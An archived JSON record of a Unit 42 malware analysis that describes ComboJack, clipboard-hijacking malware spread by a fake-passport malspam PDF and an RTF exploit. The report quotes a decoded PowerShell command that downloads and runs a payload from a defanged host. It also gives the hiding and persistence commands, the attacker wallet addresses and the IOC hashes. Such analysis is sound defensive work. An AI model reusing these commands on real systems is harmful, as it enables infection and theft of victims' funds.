{
	"id": "1e5bddc4-2605-4ff8-9ffd-21548a25a756",
	"created_at": "2026-04-06T00:08:39.284499Z",
	"updated_at": "2026-04-10T03:20:57.724587Z",
	"deleted_at": null,
	"sha1_hash": "48ed7b540eef3b39b1193983ebdcb73ef7f1e0dd",
	"title": "Sure, I’ll take that! New ComboJack Malware Alters Clipboards to Steal Cryptocurrency",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 386181,
	"plain_text": "Sure, I’ll take that! New ComboJack Malware Alters Clipboards to\r\nSteal Cryptocurrency\r\nBy Brandon Levene, Josh Grunzweig\r\nPublished: 2018-03-05 · Archived: 2026-04-05 13:32:42 UTC\r\nSummary\r\nUnit 42 researchers have discovered a new currency stealer which targets cryptocurrencies and online wallets.\r\n\"CryptoJack\" functions by replacing clipboard addresses with an attacker-controlled address which sends funds\r\ninto the attacker's wallet. This technique relies on victims not checking the destination wallet prior to finalizing a\r\ntransaction. In 2017, CryptoShuffler was the first malware to utilize this tactic. In contrast to that one, which\r\nfocused on numerous cryptocurrencies, ComboJack targets both a range of cryptocurrencies, as well as digital\r\ncurrencies such as WebMoney and Yandex Money.\r\n  Details\r\nEarly on the morning of February 25, 2018, Unit 42 and Proofpoint researchers observed an interesting malspam\r\ncampaign targeting Japanese and American users. This particular campaign tried to entice users by claiming a\r\npassport was lost and that the attached PDF contained a scanned copy of the document.\r\nImage 1. Example malspam recieved by users.\r\nUsers opening this PDF would find a single line of text which refers to an embedded doc file.\r\nhttps://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\r\nPage 1 of 7\n\nFigure 1 Prompt displayed to the victim when opening the embedded RTF file\r\n \r\nSimilar to techniques utilized by Dridex and Locky in mid-2017, the PDF contained an embedded RTF file which\r\ncontains an embedded remote object that attacks CVE-2017-8579 as discussed in this FireEye report.\r\nThis embedded remote object is an HTA file which was located at hXXps://a.doko[.]moe/tnejln which contains\r\nencoded PowerShell commands.\r\nImage 2. Contents of the HTA file retrieved from hXXps://a.doko[.]moe/tnejln\r\n \r\nDecoding the contents of the HTA file yields the following PowerShell command which downloads and executes a\r\nfile:\r\nhttps://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\r\nPage 2 of 7\n\nwscript.shell%systemroot%\\system32\\windowspowershell\\v1.0\\powershell.exe (new-object\r\nsystem.net.webclient).downloadfile(\r\nhXXp://masolo[.]win/protect/achi.exe $env:appdata\\bstest.exe) ; start $env:appdata\\bstest.exe\r\nThe full flow of execution may be visualized as follows:\r\nFigure 2 Flow of execution leading to ComboJack being installed on victim\r\n \r\nThat leads us to the payload, which we have dubbed ComboJack because of how it attempts to hijack a\r\ncombination of digital currencies.\r\n  ComboJack\r\nThe following files were used for this analysis, which are explained below.\r\nInitial File SHA256\r\n9613aefc12880528040812b0ce9d3827d1c25fe66f8598eaef82c169e8ed02da\r\n \r\nSecond Stage SHA256 cab010b59cf9d649106477df012ca49f939aa537910b56bfadbe1381b0484d88\r\nFinal Payload SHA256 05dfde82a9790943df8dfab6b690ec18711ce3558f027dd74504b125d24d6136\r\n \r\nThe initially downloaded file is a self-extracting executable (SFX) with embedded commands for extracting the\r\nsecond stage. This second stage is a password protected SFX, however, the password is supplied by the first stage.\r\nThis allows us to easily recover the contents of the second stage. Helpfully, the “setup.txt” from the first stage\r\ncontains the following:\r\nhttps://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\r\nPage 3 of 7\n\nImage 3. Contents of setup.txt embedded in the first SFX layer of the payload.\r\n \r\nOnce the second stage is extracted and run, we are presented with the final stage of this attack, which we refer to\r\nas ComboJack. Once ComboJack is extracted it begins by copying itself to the following location:\r\nC:\\\\ProgramData\\\\NVIDIA\\\\NVDisplay.Container.exe\r\nIt then uses the built-in Windows tool, attrib.exe (used for setting file attributes), to set both hidden and system\r\nattributes to itself. This hides the file from the user and allows it to execute with SYSTEM level privileges.\r\n\"cmd /k attrib +s +h \\\"C:\\\\ProgramData\\\\NVIDIA\\\\NVDisplay.Container.exe\\\"\"\r\nFinally, the payload sets the following registry key to ensure persistence:\r\nHKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\NVIDIA – C:\\\r\nProgramData\\NVIDIA\\NVDisplay.Container.exe\r\nWhen the above steps are completed, ComboJack enters into an infinite loop. Every half second it checks the\r\ncontents of the clipboard. The contents of the clipboard are checked for various criteria to determine if the victim\r\nhas copied wallet information for various digital currencies. In the event a wallet of interest is discovered,\r\nComboJack will replace it with a hardcoded wallet that the attacker presumably owns in an attempt to have the\r\nvictim accidentally send money to the wrong location. This tactic relies on the fact that wallet addresses are\r\ntypically long and complex and to prevent errors, most users will opt to copy an exact string in order to prevent\r\nhttps://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\r\nPage 4 of 7\n\npotential errors. If any potential currency addresses are found, they are replaced following the criteria in the table\r\nbelow:\r\n \r\nChecks\r\nfor this\r\ncriteria\r\nReplaces with Wallet Type\r\nLength\r\nof 42\r\nand\r\nstarts\r\nwith a\r\n‘0’\r\n0xE44598AB74425450692F7b3a9f898119968da8Ad Ethereum\r\nLength\r\nof 106\r\nand\r\nstarts\r\nwith ‘4’\r\n4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBE\r\nMonero. It's\r\nimportant to note\r\nthat this\r\nreplacement string\r\nis not long\r\nenough, as\r\nMonero wallet\r\naddresses are\r\neither 95 or 106\r\ncharacters in\r\nlength. This was\r\nlikely a mistake\r\nmade by the\r\nauthor.\r\nLength\r\nof 34\r\nand\r\nstarts\r\nwith ‘1’\r\n1LGskAycxvcgh6iAoigcvbwTtFjSfdod2x Bitcoin\r\nLength\r\nof 34\r\nand\r\nstarts\r\nwith ‘L’\r\nLYB56d6TeMg6VmahcgfTZSALAQRcNRQUV Litecoin\r\nLength\r\nof 11\r\n79965017478 Qiwi\r\nhttps://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\r\nPage 5 of 7\n\nand\r\nstarts\r\nwith ‘8’\r\nLength\r\nof 13\r\nand\r\nstarts\r\nwith ‘R’\r\nR064565691369\r\nWebMoney\r\n(Rubles)\r\nLength\r\nof 13\r\nand\r\nstarts\r\nwith ‘Z’\r\nZ152913748562 WebMoney (USD)\r\nLength\r\nof 13\r\nand\r\nstarts\r\nwith ‘E’\r\n88888888888888888888888888888888888888888888888888 Unknown\r\nLength\r\nof 15\r\nand\r\nstarts\r\nwith\r\n‘4100’\r\n410014474125403 Yandex Money\r\nTable 1. Replacement address lookup table hardcoded into ComboJack.\r\n \r\nComboJack shares some similarities in basic functionality with CryptoShuffler, which is a malware family\r\ndiscovered by Kaspersky in 2017. However whereas CryptoShuffler focused exclusively on cryptocurrencies,\r\nComboJack also targets popular digital payment systems, such as WebMoney (USD, EUR, and RUB), and Yandex\r\nMoney.\r\n  Conclusion\r\nWith the proliferation of Cryptomining malware, it is curious to see some actors take a different route to acquiring\r\nweb-based currency. Cryptoshuffler in 2017 may have been only the beginning of simple, yet effective clipboard\r\nstealers like ComboJack. By targeting multiple cryptocurrencies and web based wallets, the author of ComboJack\r\nappears to be hedging his or her bets on which currency will boom and which will bust. As the prices of\r\ncryptocurrencies continue to rise it is likely we will see more and more malware targeting cryptocurrencies, as it\r\nhttps://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\r\nPage 6 of 7\n\npresents the fastest way to the highest profit.\r\nPalo Alto Networks WildFire customers are protected from this threat through the following ways:\r\nComboJack malware is identified as malicious and blocked via the Traps and WildFire products\r\nCustomers may monitor and track ComboJack through the AutoFocus tag\r\n \r\nIOCs\r\nLure PDFs:\r\ndd8ba88df50de86e7bb9b6343313e48e1e3b8d1a84ffca0a06a203a2f027cfdc\r\nd3a5313a0070b8400b0d661f2515a0eb83e4e6110b98e9ffb6618e457bf52714\r\n15e6984beea04bf2f26fbbe1e490c59d1f51ba7ad0dce3ac76cea21579ca694b\r\n325fd50143d6d975d9db18cf9a069c9107c3bfcad5a07653d53c0fc315ee27ab\r\n  Payload:\r\nbd1b56b6814aae369b0593dfe71450e1b45cb288f752faa2622d1b189bc6b2d6\r\n228e8b728f7b714934f5ecfa6fd5de256d1d24f634a63f2fc4663c7cfb3b9d65\r\n05dfde82a9790943df8dfab6b690ec18711ce3558f027dd74504b125d24d6136\r\nd92b4c622d3524f6d5ce8fe53d802c6a0c51fd1f56ac2b554daac24d7b4fb8ef\r\n4d96d8cfefd9cc3f86bd3ab7f054f0b0acef726a4c349359bf44d22952b4744d\r\n85c27addbf3a7234ac1e2922002fdef216994708bdda28f2ad6d3a7a1b32934e\r\nea5eb17c32767486c1b3a8ee7a8eacefab125c93414cdea97348c2ee96752f7e\r\na6807cf5ed53b34cc9513defcde56c8a956c3d574ee9f300b3a763a7c8287081\r\n8d8f497313ed797090ef552d44198f8c21f0a6ed261b30902d4d37478cd2efeb\r\n47f14c24212c32e686f0b9162530c4b966c9cff907e1920c096ad81d078f20cd\r\n05cbc6b1e98bc6f8935f95454ba214cccaf3a36c497126512669daba59a407a0\r\n8a6f75a4a58bdafed085fd640681a4c94eee54f1bfb6e5eb6dcf8eb7524d2a2e\r\n2ee9a1c554a774925f83428a0822b901d7b3ed81c247cb0d038ecc188d9f9149\r\nd0f6dcdb4f749490a7ef678e9006474c885fbb3d8e396a5c8f2150441bb34782\r\na10a5666ce31c7a3de760f33d93bd924354e7bac1f07bde9e3ac3da8e250eb6d\r\n98e896586ea71f80a2b0024ec86133bfa5163f01f4faa1b1f380f0a2ea128c2f\r\nf9bff08960484d5c97f075090b9843dc1d54839a4dabc514e8f97f809e1ceaf5\r\nc1cc9448ee5684698f7891911821a9eb86f56be8852adef613b2fab4636e7b36\r\nece82af6fa1e94904d62e86fe86810fe85b058e56a311ca24ac7667409cff8c0\r\nSource: https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\r\nhttps://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/"
	],
	"report_names": [
		"unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency"
	],
	"threat_actors": [],
	"ts_created_at": 1775434119,
	"ts_updated_at": 1775791257,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/48ed7b540eef3b39b1193983ebdcb73ef7f1e0dd.pdf",
		"text": "https://archive.orkl.eu/48ed7b540eef3b39b1193983ebdcb73ef7f1e0dd.txt",
		"img": "https://archive.orkl.eu/48ed7b540eef3b39b1193983ebdcb73ef7f1e0dd.jpg"
	}
}